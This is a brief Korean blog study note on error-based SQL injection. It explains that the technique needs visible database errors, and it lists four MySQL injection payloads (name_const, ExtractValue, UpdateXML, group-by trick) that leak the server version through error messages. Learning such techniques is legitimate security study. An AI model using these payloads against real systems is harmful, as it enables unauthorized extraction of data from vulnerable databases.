Error Based SQL Injection

Web/공부 2014. 10. 31. 21:02
반응형

사용될때

- 어떤 DB에러가 발생하는지 보여지면 사용된다. 한정된 상황에서 쓰임(SQL에러가 보일때 만)


효율

- Blind Sql Injection보다 더 효율적으로 사용된다.


Ex)


select * from (select name_const(version(),1),name_const(version(),1))a

select * from table where 1=1 and ExtractValue(1,concat(0x01,version()))

select * from table where 1=1 and UpdateXML(1,concat(0x01,version()),1)

select * from table where (@:=1)or@ group by concat(@@version,@:=!@)having@||min(0)

'Web > 공부' 카테고리의 다른 글

parse_url($_SERVER[REQUEST_URI]) [ php bug #55511]  (0) 2016.05.02
Blind SQL Injection  (0) 2014.10.31
블로그 이미지

KuroNeko_

KuroNeko

,

공지사항

태그목록

글 보관함

달력

«   2024/04   »
1 2 3 4 5 6
7 8 9 10 11 12 13
14 15 16 17 18 19 20
21 22 23 24 25 26 27
28 29 30

티스토리툴바